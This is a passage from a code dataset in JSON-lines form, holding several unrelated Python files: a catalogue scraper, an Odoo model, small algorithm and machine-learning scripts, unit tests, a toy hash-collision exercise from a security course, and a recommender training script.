\".pdf\"])\n result_check = True\n return result_check\n\n def images_to_pdf(self, img_folder):\n with open(img_folder + self.name + \"_\" + self.date + \".pdf\", \"wb\") as pdf_file:\n pdf_file.write(img2pdf.convert([img_folder + i for i in listdir(img_folder) if i.endswith(\".jpg\")]))\n\nclass web_spider(object): \n def __init__(self, web_driver, web_url, web_name, save_folder, scrsh_folder, keyword, history_path):\n self.web_driver = web_driver\n self.web_url = web_url\n self.web_name = web_name\n self.save_folder = save_folder\n self.scrsh_folder = scrsh_folder\n self.keyword = keyword\n self.history_path = history_path\n \n def get_catalogue(self):\n self.web_driver.get(self.web_url)\n self.take_screenshot()\n \n try:\n cookie_btn = self.web_driver.find_element_by_xpath(\"//button[@id='cookiesModal_bottom_accept']\")\n cookie_btn.click()\n except:\n pass\n \n catalogue_list = self.web_driver.find_elements_by_xpath(\"//ul[@class='s·city-result__container-catalogs']/li\")\n \n if len(catalogue_list) > 0:\n cata_list = []\n for catalogue_src in catalogue_list:\n try:\n 
c_name = catalogue_src.find_element_by_xpath(\".//div[@class='c·catalog__description hide-link-find']/h3\").text\n if self.keyword in c_name.lower().strip():\n c_date = \"No Date\"\n c_url = \"https://www.tiendeo.com.au/\" + catalogue_src.find_element_by_xpath(\".//div[@class='c·catalog__bottom']/a\").get_attribute('data-link')\n new_catalogue = catalogue(c_name, c_date, c_url, self.web_name, self.save_folder, self.history_path)\n cata_list.append(new_catalogue)\n except:\n continue\n \n for cata in cata_list:\n cata.set_driver(self.web_driver)\n cata.get_images()\n else:\n try:\n c_name = self.web_driver.find_element_by_xpath(\"//div[@class='c·catalog__description hide-link-find']/h3\").text\n if self.keyword in c_name.lower().strip():\n c_date = \"No Date\"\n c_url = \"https://www.tiendeo.com.au/\" + self.web_driver.find_element_by_xpath(\"//div[@class='c·catalog__bottom']/a\").get_attribute('data-link')\n new_catalogue = catalogue(c_name, c_date, c_url, self.web_name, self.save_folder, self.history_path)\n new_catalogue.set_driver(self.web_driver)\n new_catalogue.get_images()\n except:\n pass\n \n def take_screenshot(self):\n self.web_driver.get_screenshot_as_file(join(self.scrsh_folder, self.web_name + \"_\" + str(datetime.datetime.now().date()) + \".png\"))","sub_path":"download_scripts/tiendeo_dl.py","file_name":"tiendeo_dl.py","file_ext":"py","file_size_in_byte":9500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"31970122","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2021-Present IjVine Corporation ()\n\n##############################################################################\nfrom odoo import fields,models\n\n\nclass ResPartner(models.Model):\n\t_inherit = 'res.partner'\n\n\tchannel_mapping_ids = fields.One2many(\n\t\tstring = 'Mappings',\n\t\tcomodel_name = 'channel.partner.mappings',\n\t\tinverse_name = 'odoo_partner',\n\t\tcopy = False\n\t)\n","sub_path":"ijvine_ebay_base/models/core/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"157424201","text":"\nimport libs.primes as p\n\ntrinum = 1\nnum = 1\n\nwhile True:\n numdivs = p.numDivisors(trinum)\n\n if numdivs>500:\n print(\"Num: \", num, \" Trinum: \", trinum, \" Divs: \", numdivs)\n break\n\n num += 1\n trinum += num\n\nprint(trinum)\n\n","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"544447613","text":"import os\nimport json\n\n#permet d'indiquer, si la structure de dossier existe deja, l'arborescence de celle-ci\ndef print_structure(adresse_json):\n\twith open(adresse_json, 'r') as f:\n\t\tstructure_json = json.load(f)\n\t\tprint('Les dossiers ont deja ete cree')\n\t\tprint('Voici l\\'arborescence des dossiers :')\n\t\tfor key, values in structure_json.items():\n\t\t\tprint ('. 
{0}'.format(key))\n\t\t\tfor value in values:\n\t\t\t\tprint('--- {0}'.format(value))\n\n\t\t\tprint('')\n\t\t\tprint('_'*30)\n\n\n\n# create the folders following the dictionary's tree structure\ndef structure_dossier (dictionnaire):\n\tfor key, values in dictionnaire.items():\n\t\tfor value in values:\n\t\t\tdossier = '{0}/{1}/{2}'.format(adresse_base, key, value)\n\t\t\tos.makedirs(dossier)\n\t\t\tprint('Creating folder: {0}'.format(dossier))\n\n\n# create and write the json file\ndef ecriture_json (fichier_json, dictionnaire):\n\twith open (fichier_json, 'w') as f:\n\t\tjson.dump(dictionnaire, f, indent=4)\n\n\n\n\n\"\"\"set the various paths and create the variables that hold them\"\"\"\nadresse_base = r'\\Users\\ruidasilva\\Desktop\\Structure'\nadresse_base = adresse_base.replace('\\\\', '/')\n\nadresse_json = r'\\Users\\ruidasilva\\Desktop\\Structure\\structure.json'\nadresse_json = adresse_json.replace('\\\\', '/')\n\n\n\n# desired folder structure\nstructure = { \n\t\t\t'cle1' : ['valeur1', 'valeur2', 'valeur3'],\n\t\t\t'cle2' : ['valeur4', 'valeur5', 'valeur6'],\n\t\t\t'cle3' : ['valeur7', 'valeur8', 'valeur9']\n\t\t\t}\n\n\n\n# if the json file already exists and was generated with the desired tree\nif os.path.isfile(adresse_json):\n\tprint_structure(adresse_json)\n\n\n# otherwise call the functions and execute them\nelse:\n\tstructure_dossier (structure)\n\tecriture_json (adresse_json, structure)\n","sub_path":"03_structure_de_dossiers.py","file_name":"03_structure_de_dossiers.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347678945","text":"'''\nSource : https://leetcode.com/problems/binary-tree-preorder-traversal/\nAuthor : Yuan Wang\nDate : 2018-07-30\n\n/********************************************************************************** \n*Given a binary tree, return the preorder traversal of its nodes' values.\n*\n*Example:\n*\n*Input: [1,null,2,3]\n* 1\n*\t\\\n*\t 2\n*\t/\n* 3\n*\n*Output: [1,2,3]\n**********************************************************************************/\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n#\t def __init__(self, x):\n#\t self.val = x\n#\t self.left = None\n#\t self.right = None\n\n#Recursively\ndef preorderTraversal(self, root):\n\t\t\"\"\"\n\t\t:type root: TreeNode\n\t\t:rtype: List[int]\n\t\t\"\"\"\n\t\treturn self.printPreorder(root,[])\n\t\ndef printPreorder(self,root,lst):\n\tif root:\n\t\tlst.append(root.val)\n\t\tself.printPreorder(root.left,lst)\n\t\tself.printPreorder(root.right,lst)\n\t\n\treturn lst\n\n#Iteratively\ndef preorderTraversal(self, root):\n\t\"\"\"\n\t:type root: TreeNode\n\t:rtype: List[int]\n\t\"\"\"\n\t# stack storing right nodes\n\trightNodes = []\n\t\n\tresult = []\n\t\n\tcur = root\n\t\n\twhile cur:\n\t\tresult.append(cur.val)\n\t\tif cur.right:\n\t\t\trightNodes.append(cur.right)\n\t\n\t\tcur = cur.left\n\t\tif not cur and len(rightNodes)!= 0:\n\t\t\tcur = rightNodes.pop()\n\t\n\t\n\treturn result\t","sub_path":"Tree/preorderTraversal.py","file_name":"preorderTraversal.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505791911","text":"import os\nos.chdir(\"/home/vk001716/Desktop/bose_dell\")\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport pandas as pd\nimport random\nimport model as m\n\nclass model(nn.Module):\n\n    def __init__(self):\n        super(model, self).__init__()\n        self.layers = nn.Sequential(\n            nn.Linear(36, 72),\n            nn.ReLU(),\n            nn.Linear(72, 144),\n            nn.ReLU(),\n            nn.Linear(144, 36),\n            nn.ReLU(),\n            nn.Linear(36, 18),\n            nn.ReLU(),\n            nn.Linear(18, 9),\n            nn.ReLU(),\n            nn.Linear(9, 1),\n            nn.Sigmoid())\n\n    def forward(self, x):\n        return self.layers(x)\n\n\nclass master_model(nn.Module):\n\n    def __init__(self):\n        super(master_model, self).__init__()\n        self.layers = nn.Sequential(\n            nn.Linear(2, 11),\n            nn.ReLU(),\n            nn.Linear(11, 22),\n            nn.ReLU(),\n            nn.Linear(22, 44),\n            nn.ReLU(),\n            nn.Linear(44, 88),\n            nn.ReLU(),\n            nn.Linear(88, 44),\n            nn.Softmax()\n        )\n\n    def forward(self, x):\n        return self.layers(x)\n\ndef encode_locations(loc=None):\n    # one-hot encode a location name against the known locations list\n    encode = [0 for i in range(34)]\n    flag = False\n    for i in range(len(locations)):\n        if locations[i] == loc:\n            flag = True\n            break\n    if flag:\n        encode[i] = 1\n    return encode\n\nmodels = []\nmain_model = master_model()\nmain_model.load_state_dict(torch.load('main_model_saved.pkl'))\nmain_model.eval()\nfor i in range(10):\n    mod = model()\n    mod.load_state_dict(torch.load('saved_state_of_logistic{0}.pkl'.format(i+1)))\n    mod.eval()\n    models.append(mod)\nlocations = pd.read_csv('location.csv', header=None).values.tolist()[0]\nratings = pd.read_csv('rating.csv', header=None).values.tolist()[0]\n\n\ndef predict_logistic(y):\n    # input as 'logisticnumber,price,city/optional'\n    y = list(y.split(\",\"))\n    logistic_number = int(y[0]) - 1\n    del(y[0])\n    if len(y) == 1:\n        y.append(None)\n    input = []\n    input.append(int(y[0]) / 312499)\n    input.extend(encode_locations(y[1]))\n    input.append(ratings[logistic_number] / 5)\n    input = Variable(torch.FloatTensor(input))\n    pred = models[logistic_number].forward(input)\n    pred = pred.data.tolist()\n    pred = str(int(pred[0] * 120))\n    return pred\n\n\ndef predict_main(x):\n    # x has value as price\n    price = int(x)\n    x = price / 312499\n    input = []\n    input.append(x)  # price\n    input.append(ratings[random.randint(0, 9)] / 5)\n    input = Variable(torch.FloatTensor(input))\n    pred = main_model.forward(input)\n    pred = pred.data.tolist()\n    location = pred[0:34]\n    logistic = pred[34:]\n    # a single call is enough; a duplicate call whose results were never used has been dropped\n    loc, _, log = m.mod(location, logistic)\n    location = locations[loc]\n    logistic = log\n    response = '{0},{1},{2}'.format(location, logistic + 1, predict_logistic(str('{0},{1},{2} '.format(logistic, price, location))))\n    return response","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190387278","text":"from sklearn.ensemble import RandomForestClassifier\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom statistics import mean\n\ndf = pd.read_csv('page_by_page3.csv')\n#print(df)\n\nX_vars = list(df.loc[:, 'innovation':'against network neutrality'])\nX = df[X_vars]\ny = df['NN']\n\navg_accuracy_list = [0] * 100\nfor j in range(0, 100):\n\n\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n    clf = RandomForestClassifier(n_jobs=2, random_state=0)\n    clf.fit(X_train, y_train)\n\n    preds = clf.predict(X_test)\n\n    y_test = y_test.to_frame()\n    ans_list = y_test['NN'].values.tolist()\n\n    count = 0\n    for i in range(0, len(preds)):\n        if preds[i] == ans_list[i]:\n            count += 1\n    avg_accuracy_list[j] = 
count/len(preds)\n\nprint(mean(avg_accuracy_list))\n\n\n\n","sub_path":"senior-thesis/build_RF_model.py","file_name":"build_RF_model.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58879348","text":"from os.path import join\nimport numpy as np\nfrom tensorflow.python.keras.applications.resnet50 import preprocess_input\nfrom tensorflow.python.keras.applications import ResNet50\nfrom tensorflow.python.keras.preprocessing.image import load_img, img_to_array\n\nimage_size = 224\n\ndef read_and_prep_images(img_paths, img_height=image_size, img_width=image_size):\n imgs = [load_img(img_path, target_size=(img_height, img_width)) for img_path in img_paths]\n img_array = np.array([img_to_array(img) for img in imgs])\n return preprocess_input(img_array)\n\n\nif __name__ == \"__main__\":\n hot_dog_image_dir = '../input/hot-dog-not-hot-dog/seefood/train/hot_dog'\n\n hot_dog_paths = [join(hot_dog_image_dir, filename) for filename in\n ['1000288.jpg',\n '127117.jpg']]\n\n not_hot_dog_image_dir = '../input/hot-dog-not-hot-dog/seefood/train/not_hot_dog'\n not_hot_dog_paths = [join(not_hot_dog_image_dir, filename) for filename in\n ['823536.jpg',\n '99890.jpg']]\n\n img_paths = hot_dog_paths + not_hot_dog_paths\n","sub_path":"kaggle_sandbox/tutorial/image_processing/dogs.py","file_name":"dogs.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"73038146","text":"import numpy as np\n\n# Write a function that takes as input a list of numbers, and returns\n# the list of values given by the softmax function.\n\n\ndef softmax(L):\n expL = np.exp(L)\n return np.divide(expL, expL.sum())\n\n\n# e.g. 
[1, 2, 3, 4]\narr1 = [1, 2, 3, 4]\nout = softmax(arr1)\nprint(\"\\nOutput array : \\n\", out)\n","sub_path":"lesson2-15/solution2_15.py","file_name":"solution2_15.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"587324339","text":"import datetime\n\nfrom project.server.helpers.encrypter import encrypt_password\nfrom project.server.managers.database import db\n\n\nclass Annotation(db.Model):\n \"\"\" Models Model for storing model related details \"\"\"\n __tablename__ = \"ai_annotation\"\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n updated_on = db.Column(db.DateTime(), nullable=False)\n image_id = db.Column(db.Integer, db.ForeignKey('ai_image_attribute.id'), unique=True, nullable=False)\n category_id = db.Column(db.String(255), unique=True, nullable=False)\n segmentation = db.Column(db.String(255), unique=True, nullable=False)\n bbox = db.Column(db.String(255), unique=True, nullable=False)\n ignore = db.Column(db.Boolean, unique=True, nullable=False)\n iscrowd = db.Column(db.Boolean, unique=True, nullable=False)\n area = db.Column(db.Integer, unique=True, nullable=False)\n\n def __init__(self, updated_on, image_id, category_id, segmentation, bbox, ignore, iscrowd, area):\n self.updated_on = updated_on\n self.image_id = image_id\n self.category_id = category_id\n self.segmentation = segmentation\n self.bbox = bbox\n self.ignore = ignore\n self.iscrowd = iscrowd\n self.area = area\n\n def from_json(self, json):\n self.id = json.get('user_id', None)\n self.updated_on = json.get('updated_on', None)\n self.image_id = json.get('image_id', None)\n self.category_id = json.get('category_id', None)\n self.segmentation = json.get('segmentation', None)\n self.bbox = json.get('bbox', None)\n self.ignore = json.get('ignore', None)\n self.iscrowd = json.get('iscrowd', None)\n self.area = json.get('area', None)\n return self\n\n def to_dictionary(self):\n obj = {\n 'annotation_id': self.id,\n 'updated_on': self.updated_on,\n 'image_id': self.image_id,\n 'category_id': self.category_id,\n 'segmentation': self.segmentation,\n 'bbox': self.bbox,\n 'ignore': self.ignore,\n 'iscrowd': self.iscrowd,\n 'area': self.area\n }\n return obj","sub_path":"project/server/models/ai_annotation.py","file_name":"ai_annotation.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175054176","text":"\"\"\" Tests of utilities.\n\n:Author: Jonathan Karr \n:Date: 2016-11-10\n:Copyright: 2016, Karr Lab\n:License: MIT\n\"\"\"\n\nfrom wc_lang.core import (Model, Taxon, Environment, Submodel, SubmodelAlgorithm,\n Compartment,\n SpeciesType, SpeciesTypeType, Species, SpeciesCoefficient, DistributionInitConcentration,\n Reaction, RateLaw, RateLawExpression, Parameter,\n DfbaObjSpecies, DfbaObjReaction,\n DfbaObjective, DfbaObjectiveExpression,\n Observable, ObservableExpression,\n Function, FunctionExpression,\n StopCondition, StopConditionExpression,\n Evidence,\n Reference, ReferenceType, DatabaseReference,\n )\nfrom wc_lang import util\nimport shutil\nimport tempfile\nimport unittest\n\n\nclass TestUtil(unittest.TestCase):\n \"\"\" Test utilities \"\"\"\n\n def setUp(self):\n self.model = mdl = Model()\n\n self.comp_0 = comp_0 = mdl.compartments.create(id='comp_0', name='compartment 0')\n self.comp_1 = comp_1 = mdl.compartments.create(id='comp_1', name='compartment 1')\n self.compartments = compartments = 
[comp_0, comp_1]\n\n self.species_types = species_types = []\n self.species = species = []\n for i in range(8):\n spec_type = mdl.species_types.create(id='spec_type_{}'.format(\n i), name='species type {}'.format(i), type=SpeciesTypeType.metabolite)\n species_types.append(spec_type)\n\n if i != 3:\n spec = Species(species_type=spec_type, compartment=comp_0)\n else:\n spec = Species(species_type=spec_type, compartment=comp_1)\n spec.id = Species.gen_id(spec.species_type.id, spec.compartment.id)\n spec.model = mdl\n species.append(spec)\n\n conc = DistributionInitConcentration(id=DistributionInitConcentration.gen_id(spec.id), species=spec, mean=1)\n conc.model = mdl\n\n self.submdl_0 = submdl_0 = mdl.submodels.create(id='submdl_0', algorithm=SubmodelAlgorithm.ssa)\n self.submdl_1 = submdl_1 = mdl.submodels.create(id='submdl_1', algorithm=SubmodelAlgorithm.ssa)\n self.submdl_2 = submdl_2 = mdl.submodels.create(id='submdl_2', algorithm=SubmodelAlgorithm.dfba)\n self.submodels = [submdl_0, submdl_1, submdl_2]\n\n self.rxn_0 = rxn_0 = submdl_0.reactions.create(id='rxn_0', model=mdl)\n rxn_0.participants.create(species=species[0], coefficient=-2)\n rxn_0.participants.create(species=species[1], coefficient=-3)\n rxn_0.participants.create(species=species[2], coefficient=1)\n expression = RateLawExpression(\n expression='k_cat_0 * {0} / (k_m_0 + {0})'.format(species[5].get_primary_attribute()),\n species=species[5:6])\n expression.parameters.create(id='k_cat_0', value=2, model=mdl)\n expression.parameters.create(id='k_m_0', value=1, model=mdl)\n rate_law_0 = rxn_0.rate_laws.create(expression=expression, model=mdl)\n\n self.rxn_1 = rxn_1 = submdl_1.reactions.create(id='rxn_1', model=mdl)\n rxn_1.participants.create(species=species[0], coefficient=-2)\n rxn_1.participants.create(species=species[1], coefficient=-3)\n rxn_1.participants.create(species=species[3], coefficient=2)\n expression = RateLawExpression(\n expression='k_cat_1 * {0} / (k_m_1 + {0})'.format(species[6].get_primary_attribute()),\n species=species[6:7])\n expression.parameters.create(id='k_cat_1', value=2, model=mdl)\n expression.parameters.create(id='k_m_1', value=1, model=mdl)\n rate_law_1 = rxn_1.rate_laws.create(expression=expression, model=mdl)\n\n self.rxn_2 = rxn_2 = submdl_2.reactions.create(id='rxn_2', model=mdl)\n rxn_2.participants.create(species=species[0], coefficient=-2)\n rxn_2.participants.create(species=species[1], coefficient=-3)\n rxn_2.participants.create(species=species[4], coefficient=1)\n expression = RateLawExpression(\n expression='k_cat_2 * {0} / (k_m_2 + {0})'.format(species[7].get_primary_attribute()),\n species=species[7:8])\n expression.parameters.create(id='k_cat_2', value=2, model=mdl)\n expression.parameters.create(id='k_m_2', value=1, model=mdl)\n rate_law_2 = rxn_2.rate_laws.create(expression=expression, model=mdl)\n\n self.reactions = [rxn_0, rxn_1, rxn_2]\n self.rate_laws = [rate_law_0, rate_law_1, rate_law_2]\n\n self.parameters = parameters = []\n self.references = references = []\n self.db_refs = db_refs = []\n for i in range(3):\n param = mdl.parameters.create(id='param_{}'.format(i))\n parameters.append(param)\n\n ref = param.references.create(id='ref_{}'.format(i), type=ReferenceType.misc)\n ref.model = mdl\n references.append(ref)\n\n x_ref = ref.db_refs.create(database='Y', id='x')\n db_refs.append(x_ref)\n\n def test_get_model_size(self):\n model = self.model\n size = util.get_model_size(model)\n self.assertEqual(3, size['submodels'])\n self.assertEqual(8, size['species_types'])\n 
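        # setUp built exactly one Species per SpeciesType, so the species count matches the species-type count below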
self.assertEqual(8, size['species'])\n self.assertEqual(3, size['reactions'])\n self.assertEqual(2, size['compartments'])\n self.assertEqual(9, size['parameters'])\n self.assertEqual(3, size['references'])\n\n def test_get_model_summary(self):\n model = self.model\n summary = util.get_model_summary(model)\n self.assertIsInstance(summary, str)\n\n def test_get_models(self):\n non_inline_models = set([\n Model, Taxon, Environment,\n Submodel, Compartment, SpeciesType, Species, Observable, DistributionInitConcentration,\n DfbaObjective,\n Reaction, RateLaw, DfbaObjSpecies, DfbaObjReaction, Parameter, Function,\n StopCondition, Evidence, Reference,\n ])\n inline_models = set([\n SpeciesCoefficient, RateLawExpression,\n DfbaObjectiveExpression, FunctionExpression, StopConditionExpression, ObservableExpression,\n DatabaseReference,\n ])\n self.assertEqual(set(util.get_models()), non_inline_models | inline_models)\n self.assertEqual(set(util.get_models(inline=False)), non_inline_models)\n\n def test_set_git_repo_metadata_from_path(self):\n model = Model()\n self.assertEqual(model.url, '')\n\n util.set_git_repo_metadata_from_path(model, path='.')\n self.assertIn(model.url, [\n 'https://github.com/KarrLab/wc_lang.git',\n 'ssh://git@github.com/KarrLab/wc_lang.git',\n 'git@github.com:KarrLab/wc_lang.git',\n ])\n\n def test_set_git_repo_metadata_from_path_error(self):\n tempdir = tempfile.mkdtemp()\n\n model = Model()\n self.assertEqual(model.url, '')\n\n with self.assertRaisesRegex(ValueError, 'is not a Git repository'):\n util.set_git_repo_metadata_from_path(model, path=tempdir)\n self.assertEqual(model.url, '')\n\n shutil.rmtree(tempdir)\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"146257343","text":"from itertools import product\n\n\ndef simple_hash(s):\n r = 7\n for c in s:\n r = (r * 31 + ord(c)) % 2 ** 16\n return r\n\n\ndef crack(s1):\n hash1 = simple_hash(s1)\n alphabet = \"qwertyuiopasdfghjklzxcvbnm\"\n\n for i in range(0, len(alphabet)):\n product_list = list(product(alphabet, repeat=i))\n\n for i in range(0, len(product_list)):\n s2 = (''.join(map(str, product_list[i])))\n hash2 = simple_hash(s2)\n\n if (hash1 == hash2) and (s1 != s2):\n return s2\n\n\nstring1 = \"foo\"\nstring2 = crack(string1)\nprint(string2)\n","sub_path":"IsraelX - Unlocking Information Security/Unlocking Information Security: Part Ⅰ/Lesson 3/Hackxercise 3.py","file_name":"Hackxercise 3.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344572642","text":"\"\"\"\nuse time to cut sequences\ncommand \npython main_time.py --data_folder ../Data/xing/ --train_data train_item.pickle --valid_data test_item.pickle --test_data test_item.pickle --data_name xing --embedding_dim 300 --hidden_size 300 --lr 0.005\n\"\"\"\nimport argparse\nimport torch\n# import lib\nimport numpy as np\nimport os\nimport datetime\nfrom loss import *\nfrom network import *\nfrom optimizer import *\nfrom trainer import *\nfrom torch.utils import data\nimport pickle\nimport sys\nfrom dataset_time import *\n# from data_time import *\nfrom logger import *\nimport collections\n\nimport sys\nsys.path.insert(0, '../PyTorch_GBW_LM')\nsys.path.insert(0, '../PyTorch_GBW_LM/log_uniform')\n\nfrom sampledSoftmax import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--hidden_size', default=50, 
type=int)\nparser.add_argument('--num_layers', default=1, type=int)\nparser.add_argument('--batch_size', default=100, type=int)\nparser.add_argument('--dropout_input', default=0, type=float)\nparser.add_argument('--dropout_hidden', default=.2, type=float)\n\n# parse the optimizer arguments\nparser.add_argument('--optimizer_type', default='Adagrad', type=str)\nparser.add_argument('--final_act', default='tanh', type=str)\nparser.add_argument('--lr', default=.05, type=float)\nparser.add_argument('--weight_decay', default=0.0, type=float)\nparser.add_argument('--momentum', default=0.1, type=float)\nparser.add_argument('--eps', default=1e-6, type=float)\n\nparser.add_argument(\"-seed\", type=int, default=7,\n\t\t\t\t\t help=\"Seed for random initialization\")\nparser.add_argument(\"-sigma\", type=float, default=None,\n\t\t\t\t\t help=\"init weight -1: range [-sigma, sigma], -2: range [0, sigma]\")\nparser.add_argument(\"--embedding_dim\", type=int, default=-1,\n\t\t\t\t\t help=\"using embedding\")\n# parse the loss type\nparser.add_argument('--loss_type', default='TOP1', type=str)\n# parser.add_argument('--loss_type', default='BPR', type=str)\nparser.add_argument('--topk', default=5, type=int)\n# etc\nparser.add_argument('--bptt', default=1, type=int)\nparser.add_argument('--test_observed', default=5, type=int)\nparser.add_argument('--window_size', default=30, type=int)\nparser.add_argument('--warm_start', default=5, type=int)\n\nparser.add_argument('--n_epochs', default=20, type=int)\nparser.add_argument('--time_sort', default=False, type=bool)\nparser.add_argument('--save_dir', default='models', type=str)\nparser.add_argument('--data_folder', default='../Data/movielen/1m/', type=str)\nparser.add_argument('--data_action', default='item.pickle', type=str)\nparser.add_argument('--data_cate', default='cate.pickle', type=str)\nparser.add_argument('--data_time', default='time.pickle', type=str)\nparser.add_argument(\"--is_eval\", action='store_true')\nparser.add_argument('--load_model', default=None, type=str)\nparser.add_argument('--checkpoint_dir', type=str, default='checkpoint')\nparser.add_argument('--data_name', default=None, type=str)\nparser.add_argument('--shared_embedding', default=None, type=int)\nparser.add_argument('--patience', default=1000)\nparser.add_argument('--negative_num', default=1000, type=int)\nparser.add_argument('--valid_start_time', default=0, type=int)\nparser.add_argument('--test_start_time', default=0, type=int)\nparser.add_argument('--model_name', default=\"samplePaddingSessionRNN\", type=str)\n\n# Get the arguments\nargs = parser.parse_args()\nargs.cuda = torch.cuda.is_available()\n\nnp.random.seed(args.seed)\ntorch.manual_seed(7)\nrandom.seed(args.seed)\n\nif args.cuda:\n\tprint(\"gpu\")\n\ttorch.cuda.manual_seed(args.seed)\nelse:\n\tprint(\"cpu\")\n\ndef make_checkpoint_dir(log):\n\tprint(\"PARAMETER\" + \"-\"*10)\n\tnow = datetime.datetime.now()\n\tS = '{:02d}{:02d}{:02d}{:02d}'.format(now.month, now.day, now.hour, now.minute)\n\tcheckpoint_dir = \"../log/\"+args.model_name+\"/\"+args.checkpoint_dir\n\targs.checkpoint_dir = checkpoint_dir\n\tsave_dir = os.path.join(args.checkpoint_dir, S)\n\n\tif not os.path.exists(\"../log\"):\n\t\tos.mkdir(\"../log\")\n\t\n\tif not os.path.exists(\"../log/\"+args.model_name):\n\t\tos.mkdir(\"../log/\"+args.model_name)\n\n\tif not os.path.exists(args.checkpoint_dir):\n\t\tos.mkdir(args.checkpoint_dir)\n\n\tif not os.path.exists(save_dir):\n\t\tos.mkdir(save_dir)\n\n\targs.checkpoint_dir = save_dir\n\t\n\twith 
open(os.path.join(args.checkpoint_dir, 'parameter.txt'), 'w') as f:\n\t\tfor attr, value in sorted(args.__dict__.items()):\n\t\t\tmsg = \"{}={}\".format(attr.upper(), value)\n\t\t\tlog.addOutput2IO(msg)\n\t\t\tf.write(\"{}={}\\n\".format(attr.upper(), value))\n\n\tmsg = \"---------\" + \"-\"*10\n\tlog.addOutput2IO(msg)\n\ndef init_model(model):\n\tif args.sigma is not None:\n\t\tfor p in model.parameters():\n\t\t\tif args.sigma != -1 and args.sigma != -2:\n\t\t\t\tsigma = args.sigma\n\t\t\t\tp.data.uniform_(-sigma, sigma)\n\t\t\telif len(list(p.size())) > 1:\n\t\t\t\tsigma = np.sqrt(6.0 / (p.size(0) + p.size(1)))\n\t\t\t\tif args.sigma == -1:\n\t\t\t\t\tp.data.uniform_(-sigma, sigma)\n\t\t\t\telse:\n\t\t\t\t\tp.data.uniform_(0, sigma)\n\ndef count_parameters(model):\n\tparameter_num = sum(p.numel() for p in model.parameters() if p.requires_grad)\n\tprint(\"parameter_num\", parameter_num) \n\ndef main():\n\n\thidden_size = args.hidden_size\n\tnum_layers = args.num_layers\n\tbatch_size = args.batch_size\n\tdropout_input = args.dropout_input\n\tdropout_hidden = args.dropout_hidden\n\tembedding_dim = args.embedding_dim\n\tfinal_act = args.final_act\n\tloss_type = args.loss_type\n\ttopk = args.topk\n\toptimizer_type = args.optimizer_type\n\tlr = args.lr\n\tweight_decay = args.weight_decay\n\tmomentum = args.momentum\n\teps = args.eps\n\tBPTT = args.bptt\n\n\tn_epochs = args.n_epochs\n\ttime_sort = args.time_sort\n\n\twindow_size = args.window_size\n\tshared_embedding = args.shared_embedding\n\n\tlog = Logger()\n\tlog.addIOWriter(args)\n\n\tmsg = \"main_time.py \"\n\tmsg += \"shared_embedding\"+str(shared_embedding)\n\tlog.addOutput2IO(msg)\n\n\tif embedding_dim == -1:\n\t\tmsg = \"embedding dim not -1 \"+str(embedding_dim)\n\t\tlog.addOutput2IO(msg)\n\t\traise AssertionError()\n\n\tdata_name = args.data_name\n\n\tprint(\"*\"*10)\n\tprint(\"train load\")\n\n\tobserved_threshold = args.test_observed\n\n\tdata_action = args.data_folder+args.data_action\n\tdata_cate = args.data_folder+args.data_cate\n\tdata_time = args.data_folder+args.data_time\n\t\n\tvalid_start_time = args.valid_start_time\n\ttest_start_time = args.test_start_time\n\n\tst = datetime.datetime.now()\n\tdata_obj = MYDATA(data_action, data_cate, data_time, valid_start_time, test_start_time, observed_threshold, window_size)\n\tet = datetime.datetime.now()\n\tprint(\"load data duration \", et-st)\n\n\ttrain_data = data_obj.train_dataset\n\tvalid_data = data_obj.test_dataset\n\ttest_data = data_obj.test_dataset\n\n\tprint(\"+\"*10)\n\tprint(\"valid load\")\n\n\tinput_size = data_obj.items()\n\toutput_size = input_size\n\n\tmessage = \"input_size \"+str(input_size)\n\tlog.addOutput2IO(message)\n\n\tnegative_num = args.negative_num\n\n\tmessage = \"negative_num \"+str(negative_num)\n\tlog.addOutput2IO(message)\n\n\ttrain_data_loader = MYDATALOADER(train_data, batch_size)\n\tvalid_data_loader = MYDATALOADER(valid_data, batch_size)\n\ttest_data_loader = MYDATALOADER(valid_data, batch_size)\n\n\tif not args.is_eval:\n\t\tmake_checkpoint_dir(log)\n\n\tif not args.is_eval:\n\t\t\n\t\tss = SampledSoftmax(output_size, negative_num, embedding_dim, None)\n\n\t\tnetwork = GRU4REC(log, ss, input_size, hidden_size, 